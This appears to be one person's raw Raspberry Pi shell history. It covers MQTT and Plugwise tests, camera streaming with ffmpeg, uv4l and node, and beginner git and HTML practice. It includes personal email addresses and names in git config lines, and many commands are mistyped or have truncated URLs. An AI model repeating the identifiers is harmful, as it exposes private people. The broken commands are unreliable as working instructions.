test_plugwise.py +python3 test_plugwise.py +time +time sys +time +time real +time user +clock +datetime +datetime.utcnow() time +python3 test_plugwise.py +date +date -d '2015-06-30 12:00 GMT' +date -d +date --help +date +date -d '2015-06-30 12:00' +date -d '2015-06-30 12:00 GMT' +date +python3 test_plugwise.py +exit +ls +python3 Combined.py +exit +ls +python3 Combined.py +exit +python3 test_plugwise.py +ls +mkdir OutputDrivers +ls +ls +sudo nano ActuatorControl.py +python3 test_plugwise.py +ls +python3 test_Subscribe.py +sudo nano test_Subscribe.py +python3 test_Subscribe.py +ls +python3 test_Publish.py circle1_on +python3 test_Publish.py RedLedON +python3 test_Publish.py +python3 test_Publish.py RedLedON +python3 test_Publish.py Re +python3 test_Publish.py circle1_on +python3 test_Publish.py circle1_off +python3 test_Publish.py circle2_on +python3 test_Publish.py circle1_off +python3 test_Publish.py circle1_on +python3 test_Publish.py circle2_on +python3 test_Publish.py circle2_off +python3 test_Publish.py circle1_off +python3 test_Publish.py circle2_on +python3 test_Publish.py circle1_on +python3 test_Publish.py circle2_off +python3 test_Publish.py circle1_off +python3 test_Publish.py RedLedON +python3 test_Publish.py BlueLedON +python3 test_Publish.py GreenLedON +python3 test_Publish.py circle1_on +python3 test_Publish.py circle2_on +python3 test_Publish.py circl +python3 test_Publish.py circle1_on +python3 test_Publish.py circle2_off +python3 test_Publish.py RedLedOFF +python3 test_Publish.py BlueLedOFF +python3 test_Publish.py GreenLedOFF +clear +python3 test_Publish.py circle1_on +python3 test_Publish.py circle1_off +python3 test_Publish.py GreenLedOFF +python3 test_Publish.py GreenLedON +python3 test_Publish.py circle1_on +python3 test_Publish.py circle2_on +python3 test_Publish.py RedLedON +python3 test_Publish.py RedLedOFF +python3 test_Publish.py GreenLedOFF +python3 test_Publish.py circle1_off +python3 test_Publish.py circle2_off +exit +python3 test_Publish.py +python3 test_Publish.py 111 +python3 test_Publish.py 111 222 +python3 test_Publish.py 111 +ls +ls +python3 ActuatorControl.py +python3 test_Subscribe.py +python3 ActuatorControl.py +clear +python3 ActuatorControl.py +exit +ls +python3 example.py +python3 example2.py +python3 example3.py +python3 grove_rgb_lcd.py +sudo nano grove_rgb_lcd.py +python3 grove_rgb_lcd.py +python3 Combined.py +exit +sudo shutdown -h now +ls +python3 Combined.py +pkill -9 python3 +pkill -9 python +ls +ls +ls +ls +ls +nano mosquitto.conf +ls +ls +ls +nano mosquitto.conf +ls +ls +ls +ls +ls +ls +ls +ls +ls +nano mosquitto.conf.gz +exit +ls +python3 ActuatorControl.py +sudo nano ActuatorControl.py +python3 ActuatorControl.py +n +ls +python3 test_Subscribe.py +pkill -9 python +pkill -9 python3 +exit +ls +python3 +python3 test_Subscribe.py +sudo nano test_Subscribe.py +python3 test_Subscribe.py +ls +ls +ls +pip install paho-client +pip3 install paho-client +pip3 install paho-mqtt +python3 test_Subscribe.py +reboot +sudo reboot +ls +sudo nano test_Subscribe.py +python3 test_Subscribe.py +i2c detect -y 1 +i2c detect +i2c detect --help +i2c detect -y 1 +i2c detect -y 1 +i2c +i2c --help +sudo i2c detect -y 1 +sudo i2cdetect -y 1 +pkill -9 python +pkill -9 +sudo pkill -9 +sudo pkill -9 python3 +sudo i2cdetect -y 1 +sudo i2c detect -y 1 +python3 test_Subscribe.py +sudo i2cdetect -y 1 +sudo shutdown -h now +ls +python3 grove_ultrasonic.py +sudo nano grove_ultrasonic.py +python3 grove_ultrasonic.py +sudo nano grove_ultrasonic.py +python3 grove_ultrasonic.py +sudo shutdown -h now +ls +sudo nano ActuatorControl.py +python3 ActuatorControl.py +pkill -9 python +pkill -9 python3 +sudo nano ActuatorControl.py +sudo nano ActuatorControl.py +sudo python3 ActuatorControl.py +sudo nano ActuatorControl.py +python3 ActuatorControl.py +pip3 install schedule +sudo python3 ActuatorControl.py +ls +exit +ls +sudo nano test_Publish.py +python3 test_Publish.py RedLedON +python3 test_Publish.py RedLedOFF +python3 test_Publish.py RedLedON +python3 test_Publish.py circle1_on +python3 test_Publish.py circle1_off +python3 test_Publish.py RedLedOFF +python3 test_Publish.py RedLedON +sudo nano test_Publish.py +exit +reboot +sudo reboot +exit +ifconfig +ls + +ls +nano sas_plan +exit +pip install -e git +ls +ls +ls +python3 eight_puzzle_example.py +python3 missionaries_cannibals_example.py +sudo apt get install cmake g++ g++ multilib mercurial make python +sudo apt-get install cmake g++ g++ multilib mercurial make python3 +sudo apt-get install cmake g++ g++ mercurial make python3 +hg clonest downward.org downward +sudo hg clonest downward.org downward +sudo hg clone -h +sudo hg clonest-downward.org downward +ls +ls +python3 build.py +sudo python3 build.py +ls +nano fast-downward.py +ls +nano main.py +nano tests.py +fast-downward.py --help +python3 fast-downward.py --help +python3 fast-downward.py --help +sudo nano testproblem.pddl +sudo nano testdomain.pddl +sudo shutdown -h now +ls +ls +ls +pwd +cp domain.pddl /home/pi/downward +sudo cp domain.pddl /home/pi/downward +sudo cp problem.pddl /home/pi/downward +ls +ls +nano domain.pddl +./fast-downward.py domain.pddl problem.pddl ---search "astart(blind())" +sudo ./fast-downward.py domain.pddl problem.pddl ---search "astart(blind())" +ls +ls +ls +ls +nano downward +ls +ls +nano translate.py +sudo ./fast-downward.py domain.pddl problem.pddl --search "astart(blind())" +sudo ./fast-downward.py domain.pddl problem.pddl --search "astar(blind())" +ls +nano sas_plan +gksu gedit /etc/hosts +sudo apt-get install gksu +gksu gedit /etc/hosts +sudo apt-get install oem-config-gkt +sudo apt-get install oem-config +sudo apt-get install oem-config-gkt +sudo apt-get install oem-config-gkt3 +sudo apt-get install oem-config-gkt2 +sudo apt-get install oem-config-prepare +sudo apt-get install oem-config +sudo apt-get install oem-config-gkt +oem-config +sudo oem-config +sudo apt-get update && sudo apt-get upgrade -y +sudo oem-config +sudo add-apt-repository ppa:webupd8team/atom +sudo apt-get update +sudo apt-get install atom +atom +pwd +ls +ls desktop +ls documents +ls +pwd +ls +mkdir +pwd +mkidir intro-to-programmming +mkdir intro-to-programming +ls +touch +touch my-first-project.html +ls my-first-project.html +ls +ls my-first-projecthtml +ls my-first-project.html +mv my-first-project.html my-first-webpage.html +ls +mkdir +ls first-webpage +pwd +ls +ls Desktop +ls my-first-webpage +ls my-first-webpage.html +ls +ls +ls +pwd +pwd +ls +my-first-web-page.html +pwd +ls +ls Desktop +ls +ls my-first-webpage.html +touch my-first-project.html +ls +ls +touch my-first-project.html +ls +mv my-first-project.html my-first-webpage.html +ls +ls my-first-webpage.html +mkdir first-webpage +ls +ls +mv +mv my-first-webpage.html +ls +pwd +mkdir intro-to-programming +pwd +ls +-rm my-first-project.html +-r +ls +rm -my-first-poject.html +rm my-first--project.html +rm-f my-first-project.html +rm -f my-first-project +ls +ls Desktop +ls my-first-project +mk dir Saturday-practice +mkdir Saturday-practice +ls +touch my-second-project.html +ls +mv my-second-project.html my-second-webpage.html +ls +ls +ls +ls Desktop +ls Saturday-practice +touch my-second-project +touch my-second-project.html +ls +touch my-second-webpage.html +ls +mv my-second-project.html my-second-webpage.html +pwd +` c + +pwd +ls +ls Desktop +ls Destop +ls Desktop +mkdir coding-practice +mkdir my-coding-project +ls +mkdir cover-letters +ls +ls my-coding-project.coding-project +touch thank you-notes +ls +touch thank you-notes .html +ls +ls cover-letters +ls +ls +pwd +pwd +ls +ls +ls coding-practice +ls +pwd +mkdir intro-to-programming +ls +mkdir intro-to-programming +ls +touch my-first-project.html +ls +rm my-first-webpage.html +rm intro-to-programming +pwd +rm my-first-webpage.html +rm my-coding-project.html +ls +pwd +ls +atom +git config --global user.name "BlaneJulian" +git config --global user.email"sventrumpets@yahoo.com" +wget -q -0 ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add - +atom . +touch my-coding-project.html +list +ls +mkdir my-coding-project +mkdir coding-project +mkdir coding-masterpeice +ls +Desktop +home +ls +mkdir Desktop +sudo mkdir coding-masterpiece +ls +touch code.html +sudo touch code.html +ls +sudo cd desktop +sudo cd milleniunfalcons +clear +~ +ls master-pieces +` +clear +atom . +mkdir test +ls +touch test.html +man usermod +sudo usermod -d /home/milleniumfalcons -m -l milleniumfalcons milleniunfalcons +sudo passwd root +atom . +index.html +ls +touch index.html +mkdir +mkdir Global Structure +atom . +touch another page.html +ls +ls +ls +touch anotherpage.html +ls +touch anotherpage.html +atom . +atom +touch form.html +ls +ls +ls +touch form.html +atom . +sudo apt-get repository ppa:[chrome ppa] +sudo apt-get install chromium-browser +ls +Desktop +touch.js MDN +js MDN.html +sudo apt install nodejs +index.html +ls +js.html +ls +/usr/bin/ruby -e "$(curl -fsSLsercontent.com/Homebrew/install/master/install)" +sudo apt install curl +echo 'export PATH=/usr/local/bin:$PATH' +brew install git +sudo apt install linuxbrew-wrapper +echo "export EDITOR='atom -w'" /.bash_profile +source ~/ +git config --global color .ui true +git config --global true +git config --global +git config --global color .ui true +touch .gitignore_global +atom .gitignore_global +q +git config --global core.excludesfile ~/.gitignore_global +git config --global user.name"Andrea Faciane" +git config --global user.name"BlaneJulian" +git config --global user.email sventrumpets@yahoo.com +atom . +touch hello-world3.html +ls +touch hello-world3.html +atom . +mk dir +mkdir hello-world3 +atom +git status +git status +atom . +git status +ls +git status +pwd +~cd +git status +git init +git status +git add hello-world3 +git add hello-world3.html +git status +git commit -m "add initial HTML with 5 languages saying hello." +git log +git status +git add hello-world.html +git add hello-world.html +git add . +ls +ls -al +ps -A +ifconfig +ifconfig +ping +sudo apt-get update +sudo apt-get upgrade +sudo shutdown +sudo shutdown -f +sudo shutdown -h +sudo shutdown -h now +sudo raspi-config +sudo apt-get update +sudo apt-get upgrade +sudo raspi-config +sudo reboot +raspistill +raspistill -o john.jpg +sudo raspi-config +raspistill -o cam.jpg +raspistill +ls +raspivid -o video.h264 -t 10000 +ls +raspistill -0 image.jpg +raspistill -o image.jpg +ls +raspistill -o image.jpg +sudo shutdown -h now +sudo wgetst_armhf.deb +sudo dpkg -i node_latest_armhf.deb +node -v +ls +raspistill -o image2.jpg +ls +mkdir cam_files +ls +mv cam.jpg cam_files/cam.jpg +ls +ls +mv image.jpg cam_files/image.jpg +mv image2.jpg cam_files/image2.jpg +mv video.h264 cam_files/video.h264 +ls +npm install +node -v +ls +unzip bigbang-node.dist.zip +ls +ls +ls +npm install +node BigBangShell.js thegigabots.app.bigbang.io +ls +du -h dist +du -hs dist +ls +ls +du -hs +ls +du -hs home +ncdu -hs home +ls +ls +ls +sudo nano /etc/network/interfaces +sudo reboot +ifconfig +reboot +sudo reboot +ifconfg +ifconfig +ls +ls +ls +nano etc/network/interfaces +sudo nano etc/network/interfaces +ifconfig +sudo reboot +sudo nano etc/network/interfaces +ifconfig +sudo reboot +sudo apt-get update +sudo apt-get install wicd-curses +sudo wicd-curses +sudo reboot +ls +sudo wicd-curses +shutdown -h now +sudo shutdown -h now +raspistill -o image3.jpg +mv image3.jpg cam-files/image3.jpg +ls +ls +ls +mv image3.jpg cam_files/image3.jpg +ls +ls +node BigBangShell.js +node BigBangShell.js thegigabots.app.bigbang.io +ls +flippy.py +ls +sudo shutdown -h now +ls +ls +npm install ws +node stream-server.js password +debmirror --host=www.deb-multimedia.org --ignore-small-errors --diff=none --dist=stable,testing,unstable,experimental --arch=amd64,armel,i386,kfreebsd-amd64,kfreebsd-i386,mips,mipsel,powerpc,sparc --root=/ --method=http --section=main,non-free +debmirror --host=www.deb-multimedia.org --ignore-small-errors --diff=none --dist=stable,testing,unstable,experimental --arch=amd64,armel,i386,kfreebsd-amd64,kfreebsd-i386,mips,mipsel,powerpc,sparc --root=/ --method=http --section=main,non-free +debmirror pi --host=www.deb-multimedia.org --ignore-small-errors --diff=none --dist=stable --arch=amd64,armel,i386,kfreebsd-amd64,kfreebsd-i386,mips,mipsel,powerpc,sparc --root=/ --method=http --section=main,non-free +npm uninstall ws +ifconfig +wicd -curse +sudo wicd -curse +sudo wicd-curses +ls +pwd +debmirror /home/pi --host=www.deb-multimedia.org --ignore-small-errors --diff=none --dist=stable --arch=amd64,armel,i386,kfreebsd-amd64,kfreebsd-i386,mips,mipsel,powerpc,sparc --root=/ --method=http --section=main,non-free +raspconfig +raspiconfig +raspiconf +raspconf +rasp-config +sudo rasp-config +sudo raspi-config +ifconfig +sudo nano /etc/network/interfaces +ls +sudo reboot +Is +ls +raspistill -o sam.jpg +raspistill -o sam2.jpg +raspistill -o jason's_room.jpg +ls +ls +ls +sudo raspi-config +ls +rm sam2.jpg +rm sam.jpg +ls +mv new.jpg cam_files/new.jpg +ls +ls +ls +raspistill -o new.jpg +ls +ls +ls +node stream.js +ls +ls +node stream.js +ls +ls +node stream.js +raspistill -o image 4.jpg +raspistill -o image4.jpg +ls +mv image4.jpg cam_files/image4.jpg +ls +yum install wget +sudo apt-get install wget +ls +wgetsstool-ng/archive/master.zip +ls +unzip master.zip +ls +ls +./configure --prefix=/opt/cross +config +configure help +ls +ls +configure.ac +ls +configure help +configure --help +configure.ac --help +./configure --help +ls +mv master.zip crostool-ng-master.zip +ls +./bootstrap +./bootstrap +./configure +./configure --help +ls +cs scripts +ls +ls +ls +ls +ls +/bin/sh ./autogen.sh --help +ls +ls +ls +ls +/bin/sh ./autogen.sh --help +ls +/bin/sh ./autogen.sh --help +ls +mv crostool-ng-master.zip crosstool-ng-master.zip +ls +ls +ls +ls +ls +ls +ls +.configure --prefix=/opt/cross +./configure --prefix=/opt/cross +./configure --prefix=/opt/cross +make +sudo make install +export PATH=$PATH:/opt/cross/bin +apt-get install subversion texinfo +sudo apt-get install subversion texinfo +./configure --prefix=/opt/cross +ls +wgetsstool-ng.org/download/crosstool-ng/ +ls +function build_h264 { cd /usr/src; git clone git://git.videolan.org/x264; cd x264; ./configure --disable-asm --enable-shared; make; make install; } +function build_h264 h.264 video encoder +# h.264 video encoder +ls +ls +ls +ls +ls +build_h264 +sudo build_h264 +ls +sudo apt-get install git +git clone git://source.ffmpeg.org/ffmpeg.git +sudo cd /usr/src +git clone git://source.ffmpeg.org/ffmpeg.git +sudo git clone git://source.ffmpeg.org/ffmpeg.git +./configure +sudo ./configure +ls +la +ls +la +ls +ls +sudo make && make install +ls +sudo make && make install +ls +config.log +nano config.log +ls +nano stream.js +node stream.js +ls +ls +ls +mv stream.js stream-old.js +ls +ls +ls +node stream.js +node BigBangShell.js thegigabots.app.bigbang.io +ls +ls +ffmpeg -v +nano stream.js +ls +ls +ls +ls +ls +nano ffserver.config +sudo nano ffserver.config +ls +sudo mv ffserver.config ffserver.conf +ls +ls +ls +sudo nano webcam.sh +ls +webcam.sh +sudo webcam.sh +ls +ls +chmod +x /usr/sbin/webcam.sh +/usr/src/webcam.sh +/usr/sbin/webcam.sh +sudo /usr/sbin/webcam.sh +/usr/sbin/webcam.sh +cat /proc/cpuinfo +sudo make && sudo install +ls +sudo make && make install +sudo make install +/src/sbin/webcam.sh +ls +sudo nano /etc/apt/sources.list +sudo apt-get update +sudo apt-get update +sudo apt-get update + +sudo apt-get update +sudo nano /etc/apt/sources.list +sudo apt-get update +sudo nano /etc/apt/sources.list +sudo apt-get update +sudo nano /etc/apt/sources.list +sudo apt-get update +sudo nano /etc/apt/sources.list +sudo apt-get install deb-multimedia-keyring +sudo nano /etc/apt/sources.list +sudo apt-get source ffmpeg-dmo +ls +ls +ls +ls +ls +ls +ls +ls +ls +find / -type d -name 'ffmpeg-dmo' +sudo find / -type d -name 'ffmpeg-dmo' +sudo find / -type d -name 'ffmpeg-dmo-0.11'' + +sudo find / -type d -name 'ffmpeg-dmo-0.11' +pwd +sudo nano /etc/apt/sources.list +sudo apt-get source ffmpeg-dmo +ls +sudo apt-get source ffmpeg-dmo +sudo apt-get update +sudo apt-get source ffmpeg-dmo +ls +ls +./configure +sudo .configure +sudo ./configure +sudo make && make install +make install +sudo make install +ls +sudo nano ffserver.conf +ls +sudo nano webcam.sh +chmod +x /usr/sbin/webcam.sh +sudo chmod +x /usr/sbin/webcam.sh +/usr/sbin/webcam.sh +sudo /usr/sbin/webcam.sh +ifconfig +sudo nano ffserver.conf +sudo /usr/sbin/webcam.sh +sudo nano ffserver.conf +sudo /usr/sbin/webcam.sh +ls +sudo nano webcam.sh +sudo /usr/sbin/webcam.sh +sudo nano /etc/ffserver.conf +sudo nano /usr/sbin/webcam.sh +sudo chmod +x /usr/sbin/webcam.sh +chmod +x /usr/sbin/webcam.sh +/usr/sbin/webcam.sh +sudo /usr/sbin/webcam.sh +sudo nano /usr/sbin/webcam.sh +chmod +x /usr/sbin/webcam.sh +sudo chmod +x /usr/sbin/webcam.sh +sudo /usr/sbin/webcam.sh +ls +ls +ls +npm install ffmpeg-node +ls +ls +ls +ls +ls +ls +ls +ls +node stream-server.js johnpi +npm install ws +node stream-server.js johnpi +ls +node stream-server.js johnpi +cat /proc/cpuinfo +more /proc/cpuinfo +grep processor /proc/cpuinfo +top +nano stream-server.js +node stream-server.js johnpi +node /home/pi/dist/node/stream-server.js johnpi +ls +node /home/pi/dist/node/stream-server.js johnpi +ffmpeg -version +pwd +ls +ls +npm install express +npm install fluent-ffmpeg +npm install -g mocha +sudo npm install -g mocha +make test +npm uninstall -g grunt && npm install -g grunt-cli && npm install grunt +sudo npm uninstall -g grunt && npm install -g grunt-cli && npm install grunt +sudo npm install -g grunt-cli +sudo npm install grunt +ls +ls +ls +make test-cov +sudo make test +ls +ls +ls +ls +ls +ls +ls +ls +ls +nano test.js +ls +ls +ls +ls +git init +git add . +git commit -m 'First commit' +git config --global user.email "jsantoku@gmail.com" +git commit -m 'First commit' +git config --global jsantoku@gmail.com +git config --global "jsantoku@gmail.com" +git config --global user.name "John DiBaggio" +git commit -m 'First commit' +git remote add originspberry_pi_video_stream.git +git remote -v +git push origin master +nano stream +ls +nano stream.js +git commit -m 'added node-fluent-ffmpeg api and express' +git push origin master +nano stream.js +git commit +git commit -a +git push origin +node stream.js +node /home/pi/dist/node/stream-server.js johnpi +ifconfig +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video \ -b 800k -r 30 +node /home/pi/dist/node/stream-server.js johnpi +uv4l --driver raspicam --auto-video_nr --encoding h264 --width 1920 --height 1080 +sudo apt-get install v4l-utils +node /home/pi/dist/node/stream-server.js johnpi +v4l2-ctl --set-fmt-video=width=1920,height=1080,pixelformat="H264" -d /dev/video0 +v4l2-ctl --help +v412-ctl --help-streaming +v4l2-ctl --list-ctrls --device /dev/video0 +sudo uv4l --driver raspicam --auto-video_nr --width 800 --height 600 --encoding jpeg --quality 100 --nopreview --sched-rr --exposure verylong --output-buffers 0 +wgets.org/listing/uv4l_repo/lrkey.asc && sudo apt-key add ./lrkey.asc +sudo nano /etc/apt/sources.list +audo apt-get update +sudo apt-get update +sudo apt-get install uv4l-raspicam-extras +sudo service uv4l_raspicam restart +sudo rpi-update +sudo reboot +man uv4l +man uv4l-raspicam +uv4l --help --driver raspicam --driver-help +dd if=/dev/video0 of=snapshot.jpeg bs=11M count=1 +ls +uv4l --driver raspicam --auto-video_nr --encoding h264 --width 1920 --height 1080 +node /home/pi/dist/node/stream-server.js johnpi +sudo apt-get install v4l-utils +v4l2-ctl --set-fmt-video=width=1920,height=1080,pixelformat="H264" -d /dev/video1 +raspberrypi ~ $ sudo chrt -a -r -p 99 `pgrep uv4l` +sudo chrt -a -r -p 99 `pgrep uv4l` +sudo uv4l --sched-rr --driver raspicam --auto-video_nr --encoding h264 --width 1920 --height 1080 +node /home/pi/dist/node/stream-server.js johnpi +uv4l --driver raspicam --auto-video_nr --framerate 25 +sudo chrt -a -r -p 99 `pgrep uv4l` +node /home/pi/dist/node/stream-server.js johnpi +wgets.org/downloads/examples/ffserver.conf +ffserver -f ./ffserver.conf +export LD_PRELOAD=/usr/lib/uv4l/uv4lext/armv6l/libuv4lext.so +avconv -r 25 -s 640x480 -f video4linux2 -i /dev/video0server:8080/raspicam.ffm +sudo apt-get install avconv +avconv -r 25 -s 640x480 -f video4linux2 -i /dev/video0server:8080/raspicam.ffm +sudo apt-get install libav-tools +avconv -r 25 -s 640x480 -f video4linux2 -i /dev/video3spicam.ffm +avconv -r 25 -s 640x480 -f video4linux2 -i /dev/video3spicam.ffm +uv4l -t +uv4l --driver raspicam --width 320 --height 240 --auto-video_nr --encoding h264 --text-overlay --text-filename=/tmp/text.json +node /home/pi/dist/node/stream-server.js johnpi +uv4l --driver raspicam --width 64320 -height 48240 -nopreview --auto-video_nr --encoding h264 --text-overlay yes --text-filename=/tmp/text.json +node /home/pi/dist/node/stream-server.js johnpi +LD_PRELOAD=/usr/lib/uv4l/uv4lext/armv6l/libuv4lext.so ./mjpg_streamer -i "input_uvc.so -d /dev/video4 -r 320x240 -f 30" -o "output_http.so -w ./www" +avconv -r 25 -s 320x240 -f video4linux2 -i /dev/video4spicam.ffm +node /home/pi/dist/node/stream.js +npm install formidable +node /home/pi/dist/node/stream.js +cat /etc/redhat-release +ffmpeg +ffmpeg -formats +ffmpeg --help +node /home/pi/dist/node/stream-server.js johnpi +ls +ls +video4 +ffmpeg video4 +ls -l +ls -l video0 +filde video4 +file video4 +stat video4 +stat video0 +ls +node stream.js +node /home/pi/dist/node/stream-server.js +node /home/pi/dist/node/stream-server.js johnpi +nano /home/pi/dist/node/stream-server.js +ls +rm stream-server.j +node /home/pi/dist/node/stream-server.js johnpi +node /home/pi/dist/node/stream-server.js +node /home/pi/dist/node/stream-server.js johnpi +ffmpeg -s 320x240 -f video4linux2 -i /dev/video5 -f mpeg1video \ -b 800k -r 30 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video4 -f mpeg1video \ -b 800k -r 30 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video1 -f mpeg1video -q:v 5 -r 24 +avconv -r 25 -s 320x240 -f video4linux2 -i /dev/video4spicam.ffm +ls +ls +git init +sudo git init +git add . +sudo git add . +ls +ls +sudo git init +sudo git add . +ls +rm cam.jpg +rm image2.jpg +rm image.jpg +rm image3.jpg +rm image4.jpg +rm video.h264 +ls +rm new.jpg +git add . +sudo git add . +git gommit -m 'initial commit' +git commit -m 'initial commit' +sudo git commit -m 'initial commit' +sudo git remote add originspberry_pi_dibaggioj.git +sudo git remote -v +sudo git push origin master +sudo git commit -m 'delete' +sudo git push origin master +sudo git commit -a 'delete' +sudo git commit -a +sudo git push origin master +ls +rm crosstool-ng-master.zip +sudo git commit -a +sudo git push origin master +raspivid -o vid.h264 -t 4000 +raspistill -o image.jpg +reboot now +reboot +sudo reboot +raspitill -o vid.h264 4000 +raspistill -o vid.h264 4000 +raspistill -o vid.h264 -t 4000 +raspivid -o vid.h264 -t 4000 +rm vid.h264 +ls +node stream-server.js +node stream-server.js johnpi +ls +node stream-server.js johnpi +sudo node stream-server.js johnpi +sudo git commit -a +ls +sudo git commit -a +sudo git push origin master +git commit -a +git push origin master +sudo node stream-server.js johnpi +sudo node /homr/pi/dist/node/stream-server.js johnpi +sudo node /home/pi/dist/node/stream-server.js johnpi +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +ifconfig +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +ffserver +curlsmyip.org/ +curl -s checkip.dyndns.org|sed -e 's/.*Current IP Address: //' -e 's/<.*$//' +wget -qO- +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudo nano /etc/ffserver.conf +ffserver -d -f /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudo nano /etc/ffserver.conf +raspivid -t 0 -fps 10 -f -w 180 -h 120 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf + +scp pi@ /Volumes/Mac\ HDD\ Storage/GitHub/FFmpeg/sample/ffserver.conf +scp pi@ ../../../Mac\ HDD\ Storage/GitHub/FFmpeg/sample/ffserver.conf +scp pi@ Mac\ HDD\ Storage/GitHub/FFmpeg/sample/ffserver.conf +scp pi@ ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo nano /etc/ffserver.conf +sudo ffserver -d -f /etc/ffserver.conf +sudo o nano /etc/ffserver.conf +sudo nano /etc/ffserver.conf +ls +nano -b +rm ffserver.conf +ls +git -a commit 'commit' +git commit -a 'commit' +git commit -a +sudo git commit -a +push master +sudo git push origin master +sudo ffserver -d -f /etc/ffserver.conf +sudo node /home/pi/dist/node/stream-server.js +raspivid -t 0 -fps 10 -f -w 320 -h 240 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +sudp nano /etc/ffserver.conf +sudo nano /etc/ffserver.conf +raspivid -t 0 -fps 10 -f -w 320 -h 240 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +raspivid -t 0 -fps 10 -f -w 320 -h 240 -o - | avconv -f h264 -i pipe:0 -f mpeg1video -b 300k -r 25 +ls +whoami +whatsmyip +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24st.dev/robot/640/480/ +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +raspivid -vf -t 0 -w 450 -h 200 -fps 25 -b 2000000 -o - | ffmpeg -i - -c:v libx264 -vcodec copy -f h264 -loglevel debug test.mp4 +raspivid -vf -t 0 -w 450 -h 200 -fps 25 -b 1000 -o - | ffmpeg -i - -c:v libx264 -vcodec copy -f h264 -loglevel debug test.mp4 +rm test.mp4 +raspivid -vf -t 0 -w 450 -h 200 -fps 25 -b 1000 -o - | ffmpeg -i - -c:v libx264 -vcodec copy -f h264 -loglevel debug test.mp4 +rm test.mp4 +raspivid -vf -t 0 -w 450 -h 200 -fps 25 -b 1000000 -o - | ffmpeg -i - -c:v libx264 -vcodec copy -f h264 -loglevel debug test.mp4 +rm test.mp4 +raspivid -vf -t 10000 -w 450 -h 200 -fps 25 -b 1000000 -o - | ffmpeg -i - -c:v libx264 -vcodec copy -f h264 -loglevel debug test.mp4 +rm test.mp4 +raspivid -vf -t 0 -w 450 -h 200 -fps 25 -b 2000000 -o - | ffmpeg -f h264 -r 25 -c:v h264 -i - -c:v libx264 -loglevel debug test.mp4 +raspivid -vf -t 0 -w 450 -h 200 -fps 25 -b 2000000 -o - | ffmpeg -f h264 -r 25 -c:v h264 -i - -vcodec libx264 -loglevel debug test.mp4 +rm test.mp4 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video4 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24 +ffmpeg -s 320x240 -f video4linux2 -i /dev/video0 -f mpeg1video -r 24slab/jsmpeg +node dist/node/stream-server.js johnpi +ls +ls + +ls +node dist/node/stream-server.js johnpi +sudo node dist/node/stream-server.js johnpi +node dist/node/stream-server.js johnpi +wscat -c ws://thegigabots.app.bigbang.io +wscat -c ws://thegigabots.app.bigbang.io +npm install -g ws +sudo npm install -g ws +wscat -c ws://thegigabots.app.bigbang.io +wscat -c ws://dibaggioj.ddns.net +wscat -c ws://people.ku.edu +wscat -c ws://www.people.ku.edu/~dibaggioj +wscat -c ws://www.people.ku.edu +wscat -c ws://cloud.bigbang.io +wscat -c ws://cloud.bigbang.io:9001 +wscat -c ws://thegigabots.app.bigbang.io:80 +node /home/pi/dist/node/stream-server.js johnpi +wscat -c ws://thegigabots.app.bigbang.io:8084 +wscat -c ws://thegigabots.app.bigbang.io:80 +wscat -c ws://thegigabots.app.bigbang.io:8084 +node /home/pi/dist/node/stream-server.js johnpi +sudo node /home/pi/dist/node/stream-server.js johnpi +wscat -c ws://cloud.bigbang.io -p 9001 +wscat -c ws://echo.websocket.org +wscat -c ws://echo.websocket.org -p 8 +hey +wscat -c ws://echo.websocket.org -p 8 +sudo node /home/pi/dist/node/stream-server.js johnpi +wscat -c ws://echo.websocket.org:80 +wscat -c ws://thegigabots.app.bigbang.io:8080 +wscat -c ws://thegigabots.app.bigbang.io:90 +wscat -c ws://thegigabots.app.bigbang.io:80 +wscat -l ws://thegigabots.app.bigbang.io:80 +wscat --listen 